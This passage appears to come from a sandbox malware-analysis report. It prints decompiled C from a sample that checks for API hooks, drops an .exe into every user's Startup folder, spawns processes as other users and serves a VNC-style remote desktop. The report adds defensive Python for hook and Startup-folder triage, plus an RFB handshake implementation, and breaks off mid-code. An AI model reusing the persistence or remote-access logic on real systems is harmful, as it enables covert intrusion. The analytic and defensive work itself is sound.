    • DrawIcon.USER32 ref: 004122AC
    • lstrcmpiW.KERNEL32(?,-00000030), ref: 0041232D
    • FreeLibrary.KERNEL32(00000000), ref: 00412444
    • FreeLibrary.KERNEL32(?), ref: 0041244E
    • FreeLibrary.KERNEL32(00000000), ref: 00412458
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
    • String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll$|$A
    • API String ID: 1554524784-1501024288
    • Opcode ID: 10986500c6c58dfeb3087a70b2c4d38db88f271f68b206abea9cf8ff957aed14
    • Instruction ID: aab3634f32b12c978e74aabec75a68518172e6021f42c4b1fa6dede705e7bf31
    • Opcode Fuzzy Hash: 10986500c6c58dfeb3087a70b2c4d38db88f271f68b206abea9cf8ff957aed14
    • Instruction Fuzzy Hash: CEE1B571D00269AFCF209FE5CE88AEEBBB9FB48301F14446AE615B2250D7785991CF58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E004136AC(void* __ecx, void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, char _a8) {
    				char _v536;
    				void* _v540;
    				char _v544;
    				char _v644;
    				signed char _v648;
    				char _v748;
    				short _v760;
    				char _v764;
    				short _v772;
    				int _v776;
    				int _v780;
    				void _v781;
    				void* _v784;
    				char _v785;
    				void _v788;
    				void _v789;
    				void* _v792;
    				char _v793;
    				char _v797;
    				void* _v800;
    				void* _v804;
    				void* _v808;
    				char _v809;
    				int _v813;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				int _t73;
    				int _t78;
    				intOrPtr* _t79;
    				int _t81;
    				void* _t83;
    				int _t87;
    				void* _t91;
    				int _t99;
    				int _t107;
    				void* _t112;
    				int _t129;
    				void* _t138;
    				void* _t145;
    				void* _t147;
    				void* _t167;
    
    				_t167 = __fp0;
    				_t138 = __edx;
    				_t135 = __ecx;
    				_t149 =  &_v764;
    				_v781 = 0;
    				if(E0040C09A(0, __ecx,  &_v764,  *0x4239c4) != 0) {
    					_v780 = _v760;
    					_t129 = E00413336( &_v780, __ecx, _v764);
    					_v776 = _t129;
    					if(_t129 == 0) {
    						_v780 = 0;
    					}
    					E0040C142( &_v764);
    				}
    				if(_v780 != 0x1e6) {
    					__eflags = _v780 - 0xc;
    					if(__eflags != 0) {
    						L41:
    						E00406E85(_v772);
    						return _v785;
    					}
    					_t73 = E00412EC8(_t135, __eflags, 0x8889347b, 2);
    					_v776 = _t73;
    					__eflags = _t73;
    					if(_t73 == 0) {
    						L39:
    						__eflags = _a8 - 1;
    						if(_a8 == 1) {
    							E004088EA(0, _t149,  *0x4239c4);
    						}
    						goto L41;
    					}
    					E00412E8D(0x19367401,  &_v748, 1);
    					_t78 = E0040A668( &_v760);
    					_t149 = GetFileAttributesExW;
    					__eflags = _t78;
    					if(_t78 == 0) {
    						L23:
    						_t79 =  *0x42396c;
    						__imp__IsWellKnownSid( *_t79, 0x16);
    						__eflags = _t79 - 1;
    						if(__eflags != 0) {
    							_v789 = 0;
    							_t81 = ReadProcessMemory(0xffffffff, _t149,  &_v789, 1, 0);
    							__eflags = _t81;
    							if(_t81 == 0) {
    								L29:
    								_push( *_v780);
    								_t83 = E0040D29A(_t135, L00415BC3,  *((intOrPtr*)(_v780 + 8)));
    								_t149 = 0x4239c8;
    								_v797 = L00415BC3(_t83, 0, 0x4239c8, L00415BC3);
    								L30:
    								__eflags = _v793 - 1;
    								if(_v793 == 1) {
    									_t87 = E0040874C( &_v536, 0, _t149, 0,  &_v776);
    									__eflags = _t87;
    									_v813 = _t87 != 0;
    									__eflags = _v813;
    									if(_v813 != 0) {
    										E00412E8D(0x1a43533f,  &_v760, 1);
    										_t91 = CreateEventW(0x4239a0, 1, 0,  &_v772);
    										_t145 = _v788;
    										_v804 = _t91;
    										_v800 = _t145;
    										_push(0xffffffff);
    										__eflags = _t91;
    										if(_t91 != 0) {
    											WaitForMultipleObjects(2,  &_v792, 0, ??);
    										} else {
    											WaitForSingleObject(_t145, ??);
    										}
    										_t149 = CloseHandle;
    										__eflags = _v792;
    										if(_v792 != 0) {
    											CloseHandle(_v792);
    										}
    										CloseHandle(_v772);
    										CloseHandle(_t145);
    									}
    								}
    								L38:
    								E0040A658(_v780);
    								goto L39;
    							}
    							__eflags = _v789 - 0xe9;
    							if(_v789 != 0xe9) {
    								goto L29;
    							}
    							_t99 = GetFileAttributesExW(0x423dd6, 0x78f16360,  &_v788);
    							__eflags = _t99 - 1;
    							if(_t99 != 1) {
    								goto L29;
    							}
    							_push( *_v784);
    							E0040D29A(_t135, L00415F2F,  *((intOrPtr*)(_v784 + 4)));
    							_push(_a4);
    							_t149 = 0x4239c8;
    							_push( &_v544);
    							_v809 = L00415F2F( &_v544, _v800, L00415F2F, 0x4239c8, _t167);
    							VirtualFree(_v808, 0, 0x8000);
    							goto L30;
    						}
    						_v789 = E0041628F(__eflags);
    						goto L38;
    					} else {
    						goto L20;
    					}
    					while(1) {
    						L20:
    						_v781 = 0;
    						_t107 = ReadProcessMemory(0xffffffff, _t149,  &_v781, 1, 0);
    						__eflags = _t107;
    						if(_t107 == 0) {
    							goto L22;
    						}
    						__eflags = _v781 - 0xe9;
    						if(_v781 == 0xe9) {
    							goto L23;
    						}
    						L22:
    						Sleep(0x1f4);
    					}
    				}
    				if(E00415E78(_t135, _t138, _v772) != 0) {
    					E00412E8D(0x32901130,  &_v748, 1);
    					_t112 = CreateMutexW(0x4239a0, 1,  &_v760);
    					_v792 = _t112;
    					if(_t112 != 0) {
    						if(GetLastError() == 0xb7) {
    							CloseHandle(_v780);
    							_v780 = 0;
    						}
    						if(_v780 != 0) {
    							E004124FF(_t135,  &_v644);
    							if((_v648 & 0x00000020) != 0) {
    								 *0x423968 =  *0x423968 | 0x00000010;
    							}
    							E00405F8D();
    							if(( *0x423968 & 0x00000010) != 0) {
    								ExitWindowsEx(0x14, 0x80000000);
    							}
    							E00412E8D(0x1a43533f,  &_v748, 1);
    							_t147 = OpenEventW(2, 0,  &_v760);
    							if(_t147 != 0) {
    								SetEvent(_t147);
    								CloseHandle(_t147);
    							}
    							E004133F3(1);
    							_v785 = 1;
    							CloseHandle(_v784);
    						}
    					}
    				}
    				goto L41;
    			}

    (per-line instruction address column omitted; the listed addresses for this function range from 0x004136ac to 0x004139ef)

    APIs
      • Part of subcall function 0040C09A: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,004136D2,?,?,00000000), ref: 0040C0BF
      • Part of subcall function 0040C09A: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,004136D2,?,?,00000000), ref: 0040C0D2
    • CreateMutexW.KERNEL32(004239A0,00000001,?,32901130,?,00000001,?), ref: 0041373C
    • GetLastError.KERNEL32 ref: 0041374E
    • CloseHandle.KERNEL32(000001E6), ref: 00413765
    • ExitWindowsEx.USER32(00000014,80000000), ref: 004137A8
    • OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 004137C7
    • SetEvent.KERNEL32(00000000), ref: 004137D4
    • CloseHandle.KERNEL32(00000000), ref: 004137DB
    • CloseHandle.KERNEL32(000001E6,00000001), ref: 004137ED
    • ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 00413851
    • Sleep.KERNEL32(000001F4), ref: 00413863
    • IsWellKnownSid.ADVAPI32(?,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 00413874
    • ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,00000000,00000001,00000000), ref: 0041389C
    • VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 004138FB
    • GetFileAttributesExW.KERNEL32(00423DD6,78F16360,0000000C), ref: 004138B8
      • Part of subcall function 0040D29A: VirtualProtect.KERNEL32(00415BC3,?,00000040,00000000,74B5F9B0,?,?,00413916,?,?), ref: 0040D2AF
      • Part of subcall function 0040D29A: VirtualProtect.KERNEL32(00415BC3,?,00000000,00000000,?,?,00413916,?,?), ref: 0040D2E2
    • CreateEventW.KERNEL32(004239A0,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,004239C8,00000000,?,?,?), ref: 00413978
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00413991
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 004139A1
    • CloseHandle.KERNEL32(0000000C), ref: 004139B7
    • CloseHandle.KERNEL32(?), ref: 004139BD
    • CloseHandle.KERNEL32(?), ref: 004139C0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesErrorExitFreeKnownLastMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindows
    • String ID:
    • API String ID: 561470431-3916222277
    • Opcode ID: 2bd3b561058b10fc4b8857bcecdd05660f448771b34e7fba02d0046019db571e
    • Instruction ID: 136c45267987fb44d3816318b198adc8bc9db3729ebf6d3fc3f2a44a0403b102
    • Opcode Fuzzy Hash: 2bd3b561058b10fc4b8857bcecdd05660f448771b34e7fba02d0046019db571e
    • Instruction Fuzzy Hash: 3791D5B1508345AFD711EF608D45EEF7BE8AF84315F40092FF594A21A1C7B8DA88CB5A
    Uniqueness

    Uniqueness Score: -1.00%
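
The E004136AC listing above reads a single byte of its own process (handle 0xffffffff) at the address passed to ReadProcessMemory, 0x74B5F9B0 in a system DLL, and loops with Sleep(0x1f4) until that byte equals 0xE9, the opcode of a near `jmp rel32`, i.e. until that API prologue has been overwritten with a jump. The Python below is an added example and not code from the sample or from the report: it performs the same first-byte test and extends it to the other common redirection prologues (short jmp, `jmp [abs32]`, push/ret, int3), recovering the jump target from the bytes alone so it can be compared against the owning module's range. The reference prologue bytes are constructed, and the addresses 0x74B5F9B0 and 0x00415BC3 used in the demo are taken from the listing's API arguments only as sample values; the module base and size given to `in_module` are whatever the caller knows about the loaded module.

```python
import struct
from typing import Optional, Tuple

# A typical hot-patchable Win32 export prologue: mov edi,edi / push ebp / mov ebp,esp
# (constructed reference bytes, not memory dumped from the sample).
CLEAN_PROLOGUE = bytes.fromhex("8bff558bec")


def first_byte_is_jmp(prologue: bytes) -> bool:
    """The exact test in the listing: is the first byte 0xE9 (jmp rel32)?"""
    return len(prologue) > 0 and prologue[0] == 0xE9


def build_jmp_rel32(src_va: int, dst_va: int) -> bytes:
    """Encode a `jmp rel32` placed at src_va that lands on dst_va (used for test data)."""
    disp = (dst_va - (src_va + 5)) & 0xFFFFFFFF
    return b"\xe9" + struct.pack("<I", disp)


def classify_prologue(prologue: bytes, func_va: int) -> Tuple[str, Optional[int]]:
    """Classify the first bytes of a function located at func_va.

    Returns (kind, target): kind is 'clean', 'jmp_rel32', 'jmp_rel8', 'jmp_ind',
    'push_ret' or 'int3'; target is the absolute destination for relative jumps
    and push/ret, the address of the pointer slot for `jmp [abs32]`, else None."""
    if not prologue:
        raise ValueError("empty prologue")
    op = prologue[0]
    if op == 0xE9 and len(prologue) >= 5:                          # jmp rel32
        disp = struct.unpack_from("<i", prologue, 1)[0]
        return "jmp_rel32", (func_va + 5 + disp) & 0xFFFFFFFF
    if op == 0xEB and len(prologue) >= 2:                          # jmp rel8 to a nearby trampoline
        disp = struct.unpack_from("<b", prologue, 1)[0]
        return "jmp_rel8", (func_va + 2 + disp) & 0xFFFFFFFF
    if prologue[:2] == b"\xff\x25" and len(prologue) >= 6:         # jmp dword ptr [abs32]
        return "jmp_ind", struct.unpack_from("<I", prologue, 2)[0]
    if op == 0x68 and len(prologue) >= 6 and prologue[5] == 0xC3:  # push imm32 / ret
        return "push_ret", struct.unpack_from("<I", prologue, 1)[0]
    if op == 0xCC:                                                 # int3 left in place
        return "int3", None
    return "clean", None


def in_module(target: Optional[int], module_base: int, module_size: int) -> bool:
    """True if target lies inside [module_base, module_base + module_size)."""
    return target is not None and module_base <= target < module_base + module_size


if __name__ == "__main__":
    api_va = 0x74B5F9B0                       # address polled by the listing
    patched = build_jmp_rel32(api_va, 0x00415BC3)
    for label, data in (("clean", CLEAN_PROLOGUE), ("patched", patched)):
        kind, target = classify_prologue(data, api_va)
        print(label, first_byte_is_jmp(data), kind, hex(target) if target is not None else "-")
```

Feed it the first 16 bytes read from a live export (for instance via ReadProcessMemory on the suspected address) and check the recovered target against the module that owns the function; a target outside every loaded module's range is the footprint of an injected hook rather than an OS hot-patch.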

    C-Code - Quality: 81%
    			E0041628F(void* __eflags) {
    				char _v5;
    				char* _v12;
    				char _v16;
    				int _v20;
    				int _v24;
    				int _v28;
    				int _v32;
    				char _v56;
    				char _v88;
    				char _v608;
    				short _v1128;
    				char _v1648;
    				void* __edi;
    				void* __esi;
    				_Unknown_base(*)()* _t63;
    				int _t69;
    				char _t70;
    				char _t76;
    				int _t80;
    				char _t81;
    				char _t82;
    				char _t86;
    				char _t88;
    				WCHAR* _t98;
    				int _t99;
    				CHAR* _t110;
    				char* _t111;
    				WCHAR* _t112;
    				struct HINSTANCE__* _t113;
    				signed int _t114;
    				void* _t115;
    
    				_t112 =  &_v56;
    				_v5 = 0;
    				E00405B00(0xe1, _t112);
    				_t113 = LoadLibraryW(_t112);
    				if(_t113 == 0) {
    					L7:
    					return 0;
    				} else {
    					_t110 =  &_v88;
    					E00405ACA(0xe2, _t110);
    					_t63 = GetProcAddress(_t113, _t110);
    					if(_t63 != 0) {
    						_push( &_v12);
    						_t106 =  &_v608;
    						_push( &_v608);
    						_v12 = 0x104;
    						if( *_t63() == 1) {
    							_t98 =  &_v1128;
    							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
    							if(_t98 == 0) {
    								_t106 =  &_v608;
    								_t99 = E004079D4(_t106);
    								_v12 = _t99;
    								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
    									_t106 = _t115 + _v12 * 2 - 0x464;
    									E00407226(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
    									_v5 = 1;
    								}
    							}
    						}
    					}
    					FreeLibrary(_t113);
    					if(_v5 != 0) {
    						_v5 = 0;
    						_v28 = 0;
    						_t111 = L".exe";
    						do {
    							_v12 = 0;
    							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
    							_v24 = _t69;
    							__eflags = _t69;
    							if(_t69 == 0) {
    								L11:
    								__eflags = _v12;
    								if(_v12 == 0) {
    									goto L24;
    								}
    								_t114 = 0;
    								__eflags = _v20;
    								if(_v20 <= 0) {
    									L23:
    									NetApiBufferFree(_v12);
    									goto L24;
    								} else {
    									goto L13;
    								}
    								do {
    									L13:
    									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
    									__eflags = _t80;
    									if(_t80 == 0) {
    										_t81 = _v16;
    										__eflags = _t81;
    										if(_t81 != 0) {
    											_t106 =  &_v608;
    											_t82 = E00413C42( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
    											__eflags = _t82;
    											if(_t82 != 0) {
    												_t86 = E0040C70A( &_v1128,  &_v608,  &_v608);
    												__eflags = _t86;
    												if(_t86 != 0) {
    													_t88 = E0040C48C( &_v608);
    													__eflags = _t88;
    													if(_t88 != 0) {
    														__eflags = E0040B335(0,  &_v608,  &_v1648, _t111, 6);
    														if(__eflags != 0) {
    															__eflags = E0041598E( &_v608, __eflags, 0,  &_v1648, 0);
    															if(__eflags != 0) {
    																_v5 = 1;
    																E00415ABB( &_v608, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
    															}
    														}
    													}
    												}
    											}
    											NetApiBufferFree(_v16);
    										}
    									}
    									_t114 = _t114 + 1;
    									__eflags = _t114 - _v20;
    								} while (_t114 < _v20);
    								goto L23;
    							}
    							__eflags = _t69 - 0xea;
    							if(_t69 != 0xea) {
    								break;
    							}
    							goto L11;
    							L24:
    							__eflags = _v24 - 0xea;
    						} while (_v24 == 0xea);
    						_t70 =  &_v1128;
    						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
    						__eflags = _t70;
    						if(_t70 == 0) {
    							__eflags = E0040B335(0,  &_v1128,  &_v1648, _t111, 6);
    							if(__eflags != 0) {
    								_t76 = E0041598E(_t106, __eflags, 0,  &_v1648, 0);
    								__eflags = _t76;
    								if(_t76 != 0) {
    									_v5 = 1;
    								}
    							}
    						}
    						return _v5;
    					}
    					goto L7;
    				}
    			}

    (per-line instruction address column omitted; the listed addresses for this function range from 0x0041629d to 0x004164c6)

    APIs
    • LoadLibraryW.KERNEL32(?,74B05B60,74B5F9B0,00000000), ref: 004162B0
    • GetProcAddress.KERNEL32(00000000,?), ref: 004162D1
    • SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00416302
    • StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00416325
    • FreeLibrary.KERNEL32(00000000), ref: 0041634C
    • NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 00416382
    • NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 004163BB
    • NetApiBufferFree.NETAPI32(?,?,?), ref: 00416454
    • NetApiBufferFree.NETAPI32(?), ref: 00416467
    • SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0041648B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
    • String ID: .exe
    • API String ID: 1753652487-4119554291
    • Opcode ID: 1077638c9c4b7a914ce724dc0d05ab6d9d310bd8fe16862d17a5de601a6ad1d5
    • Instruction ID: 55586cea70fabfa864413a87556aec7fb8c5558969b14330c9dfb4dea546f97f
    • Opcode Fuzzy Hash: 1077638c9c4b7a914ce724dc0d05ab6d9d310bd8fe16862d17a5de601a6ad1d5
    • Instruction Fuzzy Hash: CF6171B1900218AFDF10DB94CC84EEFB7BDAB44304F1045AAF915F3191D739DA898B58
    Uniqueness

    Uniqueness Score: -1.00%
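
E0041628F enumerates every local account with NetUserEnum (level 2) and NetUserGetInfo (level 0x17, USER_INFO_23, whose 32-bit field at offset 0x10 is usri23_user_sid), resolves a per-profile path from each SID, compares it with SHGetFolderPathW(CSIDL_STARTUP = 7), appends the `.exe` string to build a file name under each Startup folder and hands that path to two further subroutines, then repeats the same steps for the current user with 0x8007 (CSIDL_STARTUP | CSIDL_FLAG_CREATE). Whatever those subroutines write, the check an incident responder wants is a sweep of every profile's Startup folder for executables, with particular attention to one binary appearing in several profiles at once. The script below is an added example, not the sample's or the report's code: it walks a profile root passed on the command line (so it also works on a mounted image) and groups hits by hash. Only the standard per-user Startup path layout is assumed; `make_constructed_tree` builds constructed test data and is not part of the triage logic.

```python
import hashlib
import os
import tempfile
from dataclasses import dataclass
from typing import Dict, Iterator, List

# Per-profile Startup folder, the path CSIDL_STARTUP resolves to on Vista and later.
STARTUP_REL = os.path.join("AppData", "Roaming", "Microsoft", "Windows",
                           "Start Menu", "Programs", "Startup")
# File types worth reporting; the listing builds a name ending in ".exe".
EXEC_SUFFIXES = (".exe", ".dll", ".scr", ".com", ".pif", ".bat", ".cmd",
                 ".vbs", ".js", ".lnk")


@dataclass(frozen=True)
class StartupEntry:
    user: str
    path: str
    size: int
    sha256: str


def sha256_file(path: str, chunk: int = 1 << 16) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def iter_startup_entries(users_root: str) -> Iterator[StartupEntry]:
    """Yield one entry per executable-looking file in <users_root>/<user>/<STARTUP_REL>."""
    for user in sorted(os.listdir(users_root)):
        startup = os.path.join(users_root, user, STARTUP_REL)
        if not os.path.isdir(startup):
            continue
        for name in sorted(os.listdir(startup)):
            full = os.path.join(startup, name)
            if not os.path.isfile(full) or name.lower() == "desktop.ini":
                continue
            if not name.lower().endswith(EXEC_SUFFIXES):
                continue
            yield StartupEntry(user, full, os.path.getsize(full), sha256_file(full))


def find_startup_executables(users_root: str) -> List[StartupEntry]:
    return list(iter_startup_entries(users_root))


def shared_hashes(entries: List[StartupEntry]) -> Dict[str, List[str]]:
    """Hashes present in more than one profile: the footprint of a loop that drops the
    same binary into every account's Startup folder, and rare for legitimate software."""
    by_hash: Dict[str, List[str]] = {}
    for e in entries:
        by_hash.setdefault(e.sha256, []).append(e.user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def make_constructed_tree() -> str:
    """Constructed test data, not a real image: four profiles, two of which carry the
    same dropped file; returns the temporary users root."""
    root = tempfile.mkdtemp(prefix="users_")
    dropped = b"MZ" + b"\x00" * 62 + b"constructed placeholder, not a real PE\n"
    profiles = {
        "alice": {"update.exe": dropped},
        "bob": {"update.exe": dropped, "desktop.ini": b"[.ShellClassInfo]\n"},
        "carol": {"readme.txt": b"nothing to see\n"},
        "dave": None,                         # profile without an AppData tree
    }
    for user, files in profiles.items():
        if files is None:
            os.makedirs(os.path.join(root, user))
            continue
        startup = os.path.join(root, user, STARTUP_REL)
        os.makedirs(startup)
        for name, data in files.items():
            with open(os.path.join(startup, name), "wb") as f:
                f.write(data)
    return root


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else r"C:\Users"
    found = find_startup_executables(root)
    for e in found:
        print(f"{e.user:<16} {e.size:>8} {e.sha256[:16]}  {e.path}")
    for h, users in shared_hashes(found).items():
        print(f"same binary in {len(users)} profiles: {h[:16]} -> {', '.join(users)}")
```

On a live host run it as `python startup_sweep.py C:\Users`; on a mounted image point it at the image's Users directory. Anything it reports should be checked against the file's signature and first-seen time, since the listing creates the folder if it is missing, so an otherwise empty Startup folder containing a single unsigned .exe is itself a signal.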

    C-Code - Quality: 58%
    			E004087A7(void* _a4, WCHAR* _a8) {
    				WCHAR* _v5;
    				char _v12;
    				signed int _v16;
    				struct HINSTANCE__* _v20;
    				_Unknown_base(*)()* _v24;
    				struct _PROCESS_INFORMATION _v40;
    				struct _STARTUPINFOW _v108;
    				struct HINSTANCE__* _t28;
    				_Unknown_base(*)()* _t31;
    				WCHAR* _t49;
    				long _t50;
    				intOrPtr* _t52;
    
    				_v5 = 0;
    				_t28 = LoadLibraryA("userenv.dll");
    				_v20 = _t28;
    				if(_t28 != 0) {
    					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
    					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
    					_v24 = _t31;
    					if(_t52 != 0 && _t31 != 0) {
    						_push(0);
    						_push(_a4);
    						_push( &_v16);
    						_v16 = 0;
    						if( *_t52() == 0) {
    							_v16 = 0;
    						}
    						_t50 = 0x44;
    						_v12 = 0;
    						E00406F38( &_v108,  &_v108, 0, _t50);
    						_t49 = _a8;
    						_v108.cb = _t50;
    						_v108.lpDesktop = 0;
    						if(_t49 == 0) {
    							_t49 =  &_v12;
    						}
    						asm("sbb eax, eax");
    						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
    							CloseHandle(_v40.hThread);
    							CloseHandle(_v40);
    							_v5 = _v40.dwProcessId != 0;
    						}
    						if(_v16 != 0) {
    							_v24(_v16);
    						}
    					}
    					FreeLibrary(_v20);
    				}
    				return _v5 & 0x000000ff;
    			}

    (per-line instruction address column omitted; the listed addresses for this function range from 0x004087b5 to 0x00408891)

    APIs
    • LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 004087B8
    • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 004087D7
    • GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 004087E3
    • CreateProcessAsUserW.ADVAPI32(?,00000000,00415A9E,00000000,00000000,00000000,00415A9E,00415A9E,00000000,?,?,?,00000000,00000044), ref: 00408854
    • CloseHandle.KERNEL32(?), ref: 00408867
    • CloseHandle.KERNEL32(?), ref: 0040886C
    • FreeLibrary.KERNEL32(?), ref: 00408883
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
    • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
    • API String ID: 3080530829-1103369309
    • Opcode ID: 0dde27d4e647b15c75867e7dd017799bb16fce25c0aab1c162b9abcb0df8fcd4
    • Instruction ID: f649f022467870eed5b78bc02d1eb005975c35a69aed4518946f17f1383b2b5a
    • Opcode Fuzzy Hash: 0dde27d4e647b15c75867e7dd017799bb16fce25c0aab1c162b9abcb0df8fcd4
    • Instruction Fuzzy Hash: 4B2129B2D0025DABDF10AFE5DD849EEBBBCEB48344B14847AE501B21A0D6389D44CB64
    Uniqueness

    Uniqueness Score: -1.00%
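
The E004117CB listing that follows speaks the RFB (VNC) protocol from the server side, which is what the report's "Contains VNC / remote desktop functionality" signature picks up: it sends the version string "RFB 003.003\n", validates the 12-byte reply (prefix "RFB ", then (major << 8 | minor) minus 0x303 must not exceed 0x300, so 3.3 or newer), sends a 4-byte security type and only continues when that type is 1 (None), reads the one-byte ClientInit, and answers with a 24-byte ServerInit (big-endian width and height, a 16-byte pixel format whose three colour maxima it byte-swaps with `rol word`, a big-endian name length) followed by the desktop name. The Python below is an added example and not the sample's code: it implements the same handshake against an in-memory transport so it runs offline, with a client-side ServerInit decoder to check what was produced. The client bytes, framebuffer size and desktop name are constructed placeholders.

```python
import struct
from dataclasses import dataclass

PROTOCOL_VERSION = b"RFB 003.003\n"   # 12 bytes, as sent by the listing
SECURITY_NONE = 1                     # the only security type the listing accepts
SERVER_INIT_FIXED = 24                # 2 + 2 + 16 + 4 bytes before the name


class HandshakeError(Exception):
    pass


def parse_client_version(msg: bytes) -> tuple:
    """Validate the 12-byte version reply and return (major, minor).

    Same acceptance rule as the listing: prefix 'RFB ', decimal major/minor,
    and (major << 8 | minor) in [0x303, 0x603], i.e. RFB 3.3 or newer."""
    if len(msg) != 12 or not msg.startswith(b"RFB ") or msg[-1:] != b"\n":
        raise HandshakeError("malformed version reply")
    try:
        major, minor = (int(x) for x in msg[4:11].split(b"."))
    except ValueError as exc:
        raise HandshakeError("non-numeric version") from exc
    packed = ((major & 0xFF) << 8) | (minor & 0xFF)
    if not 0x303 <= packed <= 0x603:
        raise HandshakeError(f"unsupported RFB version {major}.{minor}")
    return major, minor


def version_accepted(msg: bytes) -> bool:
    try:
        parse_client_version(msg)
    except HandshakeError:
        return False
    return True


@dataclass(frozen=True)
class PixelFormat:
    """The 16-byte PIXEL_FORMAT structure carried in ServerInit."""
    bits_per_pixel: int = 32
    depth: int = 24
    big_endian: int = 0
    true_colour: int = 1
    red_max: int = 255       # these three u16 fields are the ones the listing byte-swaps
    green_max: int = 255
    blue_max: int = 255
    red_shift: int = 16
    green_shift: int = 8
    blue_shift: int = 0

    FMT = ">BBBBHHHBBB3x"    # network byte order, 3 bytes padding, 16 bytes total

    def pack(self) -> bytes:
        return struct.pack(self.FMT, self.bits_per_pixel, self.depth, self.big_endian,
                           self.true_colour, self.red_max, self.green_max, self.blue_max,
                           self.red_shift, self.green_shift, self.blue_shift)

    @classmethod
    def unpack(cls, raw: bytes) -> "PixelFormat":
        return cls(*struct.unpack(cls.FMT, raw[:16]))


def build_server_init(width: int, height: int, fmt: PixelFormat, name: bytes) -> bytes:
    """ServerInit: u16 width, u16 height, PIXEL_FORMAT, u32 name length, name."""
    return struct.pack(">HH", width, height) + fmt.pack() + struct.pack(">I", len(name)) + name


def parse_server_init(raw: bytes) -> dict:
    """Client-side decoder for ServerInit, used here to verify the server output."""
    if len(raw) < SERVER_INIT_FIXED:
        raise HandshakeError("short ServerInit")
    width, height = struct.unpack(">HH", raw[:4])
    fmt = PixelFormat.unpack(raw[4:20])
    (name_len,) = struct.unpack(">I", raw[20:24])
    name = raw[24:24 + name_len]
    if len(name) != name_len:
        raise HandshakeError("truncated desktop name")
    return {"width": width, "height": height, "format": fmt, "name": name}


class MemoryTransport:
    """Stand-in for the socket: bytes the peer already sent sit in `inbound`,
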